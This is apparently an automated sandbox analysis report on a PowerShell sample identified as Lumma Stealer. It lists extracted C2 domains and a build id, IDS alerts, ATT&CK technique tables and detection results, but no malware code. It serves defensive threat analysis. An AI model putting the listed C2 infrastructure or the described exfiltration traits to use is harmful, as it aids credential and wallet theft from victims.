Windows
Analysis Report
62.122.184.98 (3).ps1
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- RegSvcs.exe (PID: 7896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- RegSvcs.exe (PID: 7904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- RegSvcs.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | |
{"C2 url": ["nuttyshopr.biz", "truculengisau.biz", "punishzement.biz", "marketlumpe.biz", "spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "littlenotii.biz"], "Build id": "DUkgLv--PISYA"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T18:01:10.624646+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
2025-01-14T18:01:12.372040+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:13.594418+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:14.833090+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49728 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:16.415374+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49737 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:17.485915+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49745 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:18.529051+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:19.821171+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:23.192598+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:13.123944+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:14.083227+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:23.963228+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:13.123944+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:14.083227+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:09.877880+0100 | 2059133 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 64828 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.890771+0100 | 2059135 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57637 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.868069+0100 | 2059137 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 54196 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.903271+0100 | 2059141 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57333 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.914056+0100 | 2059143 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 54253 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.924697+0100 | 2059145 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57389 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.936322+0100 | 2059151 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 62955 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:09.947255+0100 | 2059153 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 64010 | 1.1.1.1 | 53 | UDP |
2025-01-14T18:01:18.991769+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:19.827392+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
2025-01-14T18:01:11.784193+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Code function: | 10_2_00414E18 |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: |
Source: | Code function: | 10_2_0040BA1B | |
Source: | Code function: | 10_2_0043FB02 | |
Source: | Code function: | 10_2_00420B20 | |
Source: | Code function: | 10_2_00427B30 | |
Source: | Code function: | 10_2_0043E560 | |
Source: | Code function: | 10_2_0043B500 | |
Source: | Code function: | 10_2_0043B500 | |
Source: | Code function: | 10_2_00414E18 | |
Source: | Code function: | 10_2_0040AEC0 | |
Source: | Code function: | 10_2_00441EC0 | |
Source: | Code function: | 10_2_00441EC0 | |
Source: | Code function: | 10_2_004097E0 | |
Source: | Code function: | 10_2_004097E0 | |
Source: | Code function: | 10_2_004097E0 | |
Source: | Code function: | 10_2_00425870 | |
Source: | Code function: | 10_2_00419000 | |
Source: | Code function: | 10_2_0042E815 | |
Source: | Code function: | 10_2_0041A0E0 | |
Source: | Code function: | 10_2_0041A0E0 | |
Source: | Code function: | 10_2_0042D8F5 | |
Source: | Code function: | 10_2_0042D8F5 | |
Source: | Code function: | 10_2_0042D890 | |
Source: | Code function: | 10_2_004298A0 | |
Source: | Code function: | 10_2_0043C0A0 | |
Source: | Code function: | 10_2_0042F0BD | |
Source: | Code function: | 10_2_00441940 | |
Source: | Code function: | 10_2_0042D859 | |
Source: | Code function: | 10_2_0042E961 | |
Source: | Code function: | 10_2_0042E96A | |
Source: | Code function: | 10_2_0044011F | |
Source: | Code function: | 10_2_0042F12D | |
Source: | Code function: | 10_2_0042F1D9 | |
Source: | Code function: | 10_2_0042E25A | |
Source: | Code function: | 10_2_00416258 | |
Source: | Code function: | 10_2_0043B210 | |
Source: | Code function: | 10_2_00416A39 | |
Source: | Code function: | 10_2_0042CAD0 | |
Source: | Code function: | 10_2_0043EAD0 | |
Source: | Code function: | 10_2_004412D0 | |
Source: | Code function: | 10_2_004412D0 | |
Source: | Code function: | 10_2_004412D0 | |
Source: | Code function: | 10_2_004412D0 | |
Source: | Code function: | 10_2_0042D2E0 | |
Source: | Code function: | 10_2_0042D2E0 | |
Source: | Code function: | 10_2_00428AF7 | |
Source: | Code function: | 10_2_00421A80 | |
Source: | Code function: | 10_2_00421A80 | |
Source: | Code function: | 10_2_00417AB2 | |
Source: | Code function: | 10_2_0043EB40 | |
Source: | Code function: | 10_2_00442320 | |
Source: | Code function: | 10_2_004413C0 | |
Source: | Code function: | 10_2_004413C0 | |
Source: | Code function: | 10_2_004413C0 | |
Source: | Code function: | 10_2_0042B3D0 | |
Source: | Code function: | 10_2_004413D7 | |
Source: | Code function: | 10_2_004413D7 | |
Source: | Code function: | 10_2_004413D7 | |
Source: | Code function: | 10_2_004413D9 | |
Source: | Code function: | 10_2_004413D9 | |
Source: | Code function: | 10_2_004413D9 | |
Source: | Code function: | 10_2_00409390 | |
Source: | Code function: | 10_2_00424C50 | |
Source: | Code function: | 10_2_0040A416 | |
Source: | Code function: | 10_2_004414C0 | |
Source: | Code function: | 10_2_004414C0 | |
Source: | Code function: | 10_2_004414C0 | |
Source: | Code function: | 10_2_00429CD0 | |
Source: | Code function: | 10_2_0043C480 | |
Source: | Code function: | 10_2_00413C90 | |
Source: | Code function: | 10_2_00413C90 | |
Source: | Code function: | 10_2_00429CB7 | |
Source: | Code function: | 10_2_00421550 | |
Source: | Code function: | 10_2_00414559 | |
Source: | Code function: | 10_2_00441560 | |
Source: | Code function: | 10_2_00441560 | |
Source: | Code function: | 10_2_00441560 | |
Source: | Code function: | 10_2_00420534 | |
Source: | Code function: | 10_2_0042F5CA | |
Source: | Code function: | 10_2_0041ADE2 | |
Source: | Code function: | 10_2_0041ADE2 | |
Source: | Code function: | 10_2_0043FDE4 | |
Source: | Code function: | 10_2_0043FDE4 | |
Source: | Code function: | 10_2_004075F0 | |
Source: | Code function: | 10_2_004075F0 | |
Source: | Code function: | 10_2_004415F0 | |
Source: | Code function: | 10_2_004415F0 | |
Source: | Code function: | 10_2_004415F0 | |
Source: | Code function: | 10_2_00427E50 | |
Source: | Code function: | 10_2_00438600 | |
Source: | Code function: | 10_2_0041C620 | |
Source: | Code function: | 10_2_00427E30 | |
Source: | Code function: | 10_2_00427E30 | |
Source: | Code function: | 10_2_0041E750 | |
Source: | Code function: | 10_2_0043CF68 | |
Source: | Code function: | 10_2_0040BF73 | |
Source: | Code function: | 10_2_00414710 | |
Source: | Code function: | 10_2_0043E7C0 | |
Source: | Code function: | 10_2_0041A7C6 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 10_2_00436170 |
Source: | Code function: | 10_2_00436170 |
Source: | Code function: | 10_2_004368B6 |
Source: | Window created: |
Source: | Code function: | 1_2_00007FF7C0FD514A | |
Source: | Code function: | 1_2_00007FF7C0FD5198 | |
Source: | Code function: | 1_2_00007FF7C0FDA619 | |
Source: | Code function: | 1_2_00007FF7C0FDA5D9 | |
Source: | Code function: | 1_2_00007FF7C10A0FA4 | |
Source: | Code function: | 1_2_00007FF7C10A1648 | |
Source: | Code function: | 10_2_00408860 | |
Source: | Code function: | 10_2_00442900 | |
Source: | Code function: | 10_2_0040BB50 | |
Source: | Code function: | 10_2_00427B30 | |
Source: | Code function: | 10_2_00410409 | |
Source: | Code function: | 10_2_0043B500 | |
Source: | Code function: | 10_2_0042E5CA | |
Source: | Code function: | 10_2_00420DF0 | |
Source: | Code function: | 10_2_00424D94 | |
Source: | Code function: | 10_2_00414E18 | |
Source: | Code function: | 10_2_0040AEC0 | |
Source: | Code function: | 10_2_004097E0 | |
Source: | Code function: | 10_2_00441FA0 | |
Source: | Code function: | 10_2_00425870 | |
Source: | Code function: | 10_2_00419000 | |
Source: | Code function: | 10_2_00406820 | |
Source: | Code function: | 10_2_0042003A | |
Source: | Code function: | 10_2_0042889D | |
Source: | Code function: | 10_2_0043C0A0 | |
Source: | Code function: | 10_2_0042F0BD | |
Source: | Code function: | 10_2_00403960 | |
Source: | Code function: | 10_2_0041C960 | |
Source: | Code function: | 10_2_00429161 | |
Source: | Code function: | 10_2_00429968 | |
Source: | Code function: | 10_2_0043997F | |
Source: | Code function: | 10_2_0042F12D | |
Source: | Code function: | 10_2_0042F1D9 | |
Source: | Code function: | 10_2_0040A9F0 | |
Source: | Code function: | 10_2_004119B0 | |
Source: | Code function: | 10_2_0040EA60 | |
Source: | Code function: | 10_2_0042EA61 | |
Source: | Code function: | 10_2_00435268 | |
Source: | Code function: | 10_2_00415A2F | |
Source: | Code function: | 10_2_00416A39 | |
Source: | Code function: | 10_2_004172C8 | |
Source: | Code function: | 10_2_0041EAD0 | |
Source: | Code function: | 10_2_0042CAD0 | |
Source: | Code function: | 10_2_004412D0 | |
Source: | Code function: | 10_2_0042D2E0 | |
Source: | Code function: | 10_2_00428AF7 | |
Source: | Code function: | 10_2_00421A80 | |
Source: | Code function: | 10_2_00440A81 | |
Source: | Code function: | 10_2_00417AB2 | |
Source: | Code function: | 10_2_00418ABC | |
Source: | Code function: | 10_2_0043EB40 | |
Source: | Code function: | 10_2_0040CB50 | |
Source: | Code function: | 10_2_00402B70 | |
Source: | Code function: | 10_2_0042E370 | |
Source: | Code function: | 10_2_0043AB70 | |
Source: | Code function: | 10_2_00432B7F | |
Source: | Code function: | 10_2_00404310 | |
Source: | Code function: | 10_2_00433320 | |
Source: | Code function: | 10_2_00442320 | |
Source: | Code function: | 10_2_00405B30 | |
Source: | Code function: | 10_2_00419B30 | |
Source: | Code function: | 10_2_004413C0 | |
Source: | Code function: | 10_2_004273D0 | |
Source: | Code function: | 10_2_004413D7 | |
Source: | Code function: | 10_2_004413D9 | |
Source: | Code function: | 10_2_004393F6 | |
Source: | Code function: | 10_2_00406390 | |
Source: | Code function: | 10_2_0040B620 | |
Source: | Code function: | 10_2_00425470 | |
Source: | Code function: | 10_2_0042FC10 | |
Source: | Code function: | 10_2_0041D4C0 | |
Source: | Code function: | 10_2_004414C0 | |
Source: | Code function: | 10_2_00415A2F | |
Source: | Code function: | 10_2_00413C90 | |
Source: | Code function: | 10_2_00435C90 | |
Source: | Code function: | 10_2_00408CA0 | |
Source: | Code function: | 10_2_00441CB0 | |
Source: | Code function: | 10_2_00429CB7 | |
Source: | Code function: | 10_2_00421550 | |
Source: | Code function: | 10_2_00441560 | |
Source: | Code function: | 10_2_00415D66 | |
Source: | Code function: | 10_2_0041B570 | |
Source: | Code function: | 10_2_00420534 | |
Source: | Code function: | 10_2_0043ADD0 | |
Source: | Code function: | 10_2_0043C5E0 | |
Source: | Code function: | 10_2_0041ADE2 | |
Source: | Code function: | 10_2_0042ADEB | |
Source: | Code function: | 10_2_004075F0 | |
Source: | Code function: | 10_2_004415F0 | |
Source: | Code function: | 10_2_00427E50 | |
Source: | Code function: | 10_2_00429E61 | |
Source: | Code function: | 10_2_00434E0E | |
Source: | Code function: | 10_2_00442610 | |
Source: | Code function: | 10_2_0040B620 | |
Source: | Code function: | 10_2_0041C620 | |
Source: | Code function: | 10_2_00419E20 | |
Source: | Code function: | 10_2_00404E30 | |
Source: | Code function: | 10_2_00427E30 | |
Source: | Code function: | 10_2_0040F6C0 | |
Source: | Code function: | 10_2_0041CEE0 | |
Source: | Code function: | 10_2_00411685 | |
Source: | Code function: | 10_2_004336B0 | |
Source: | Code function: | 10_2_00402F40 | |
Source: | Code function: | 10_2_00410F7A | |
Source: | Code function: | 10_2_00414710 | |
Source: | Code function: | 10_2_00425710 | |
Source: | Code function: | 10_2_00431FCA | |
Source: | Code function: | 10_2_00405FF0 | |
Source: | Code function: | 10_2_00439F86 | |
Source: | Code function: | 10_2_00423F8C |
Source: | Classification label: |
Source: | Code function: | 10_2_0043B500 |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | Section loaded: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | 1_2_00007FF7C0FD4C0D | |
Source: | Code function: | 1_2_00007FF7C0FD5411 | |
Source: | Code function: | 10_2_00448876 | |
Source: | Code function: | 10_2_004412A1 |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 10_2_0043FCF0 |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | String found in binary or memory: | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | String found in binary or memory: | ||
Source: | File opened: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 121 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 211 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 121 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 3 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 11 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 22 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
16% | ReversingLabs | Script-PowerShell.Trojan.LummaC |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
aleksandr-block.com | 188.114.97.3 | true | false | high | |
steamcommunity.com | 104.102.49.254 | true | false | high | |
littlenotii.biz | unknown | unknown | true | unknown | |
fraggielek.biz | unknown | unknown | true | unknown | |
nuttyshopr.biz | unknown | unknown | true | unknown | |
grandiouseziu.biz | unknown | unknown | true | unknown | |
marketlumpe.biz | unknown | unknown | true | unknown | |
spookycappy.biz | unknown | unknown | true | unknown | |
truculengisau.biz | unknown | unknown | true | unknown | |
punishzement.biz | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
false | high | ||
false | high | ||
true | | unknown | |
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | | unknown | ||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | | unknown | ||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
188.114.97.3 | aleksandr-block.com | European Union | 13335 | CLOUDFLARENETUS | false | |
